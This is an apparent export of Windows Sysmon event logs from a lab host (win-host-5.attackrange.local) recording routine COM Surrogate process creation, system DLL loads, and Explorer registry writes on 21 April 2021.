19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeMD5=DA63852A2B0340E94D74EAF0CD444979,SHA256=EE8364C07B3F4F71FA649E0E6C4C73C15D285130E4B16E79890EEBBF89C2164EtrueMicrosoft WindowsValid 
10341000x80000000000000001606798Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606797Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606796Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.342{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}C:\Windows\system32\WIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=DA63852A2B0340E94D74EAF0CD444979,SHA256=EE8364C07B3F4F71FA649E0E6C4C73C15D285130E4B16E79890EEBBF89C2164E{21761711-83AD-607D-0C00-00000000BB01}724C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000001606795Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606794Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606793Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001606792Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationmsvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4trueMicrosoft CorporationValid 734700x80000000000000001606791Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5trueMicrosoft CorporationValid 734700x80000000000000001606790Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140_1.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774trueMicrosoft CorporationValid 734700x80000000000000001606789Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll16.0.13127.21452Microsoft Office Shell Extension HandlersMicrosoft OfficeMicrosoft Corporationmsoshext.dllMD5=FA08E1A12DBD5DEFA00E5C10C7756F3D,SHA256=E4309D89987239A908DB9BA46DC399B952CDB764ACD8DC3E7FD35278DCD4AB96trueMicrosoft CorporationValid 13241300x80000000000000001606788Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.268{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606787Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:09.268{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606786Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.252{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606785Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.252{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606784Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606783Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 13241300x80000000000000001606782Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A06F8\VirtualDesktopBinary Data 
12241200x80000000000000001606781Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A06F8 12241200x80000000000000001606780Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance 12241200x80000000000000001606779Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance 12241200x80000000000000001606778Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance 12241200x80000000000000001606777Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance 12241200x80000000000000001606776Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001606775Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 
12241200x80000000000000001606774Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 13241300x80000000000000001606769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7LayoutBinary Data 
12241200x80000000000000001606768Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser 12241200x80000000000000001606767Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 13241300x80000000000000001606766Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon\QatItemsBinary Data 13241300x80000000000000001606765Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon\MinimizedStateTabletModeOffDWORD (0x00000001) 12241200x80000000000000001606764Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon 12241200x80000000000000001606763Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon 12241200x80000000000000001606762Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 13241300x80000000000000001606761Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\LockedDWORD (0x00000001) 12241200x80000000000000001606760Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 12241200x80000000000000001606759Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606758Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606757Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606756Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606755Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606754Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606753Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606752Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606751Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606750Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 
12241200x80000000000000001606749Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606748Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606747Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606746Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606745Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606744Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.105{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 
13241300x80000000000000001606743Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.105{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 13241300x80000000000000001606742Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606741Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001606740Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 13241300x80000000000000001606739Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 13241300x80000000000000001606738Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606737Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001606736Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 13241300x80000000000000001606735Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 13241300x80000000000000001606734Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606733Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 
12241200x80000000000000001606732Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 734700x80000000000000001606731Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\System32\svchost.exeC:\Windows\System32\deviceaccess.dll10.0.14393.4283 (rs1_release.210303-1802)Device Broker And Policy COM ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationDeviceAccess.dllMD5=BE5D6961F4736274AD28D2B2BAF0CF50,SHA256=177BF5B04802C472A158EC012FF03055E74FC7121F47DAE0D6BF0FD9579F6A1EtrueMicrosoft WindowsValid 10341000x80000000000000001606730Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606729Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\LocationFrameworkPS.dll10.0.14393.4169 (rs1_release.210107-1130)Windows Geolocation Framework PSMicrosoft® Windows® Operating SystemMicrosoft CorporationLocationFrameworkPS.dllMD5=9BA4CCDCED268D654794C53AD79F1402,SHA256=4778C3E478FC613C7B97FBCE5716F04F36CA665F643541841EB24A38B0AAB4A1trueMicrosoft WindowsValid 734700x80000000000000001606728Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\System32\svchost.exeC:\Windows\System32\LocationFrameworkPS.dll10.0.14393.4169 (rs1_release.210107-1130)Windows Geolocation Framework PSMicrosoft® Windows® Operating SystemMicrosoft CorporationLocationFrameworkPS.dllMD5=9BA4CCDCED268D654794C53AD79F1402,SHA256=4778C3E478FC613C7B97FBCE5716F04F36CA665F643541841EB24A38B0AAB4A1trueMicrosoft WindowsValid 734700x80000000000000001606727Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\deviceaccess.dll10.0.14393.4283 (rs1_release.210303-1802)Device Broker And Policy COM ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationDeviceAccess.dllMD5=BE5D6961F4736274AD28D2B2BAF0CF50,SHA256=177BF5B04802C472A158EC012FF03055E74FC7121F47DAE0D6BF0FD9579F6A1EtrueMicrosoft WindowsValid 13241300x80000000000000001606726Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 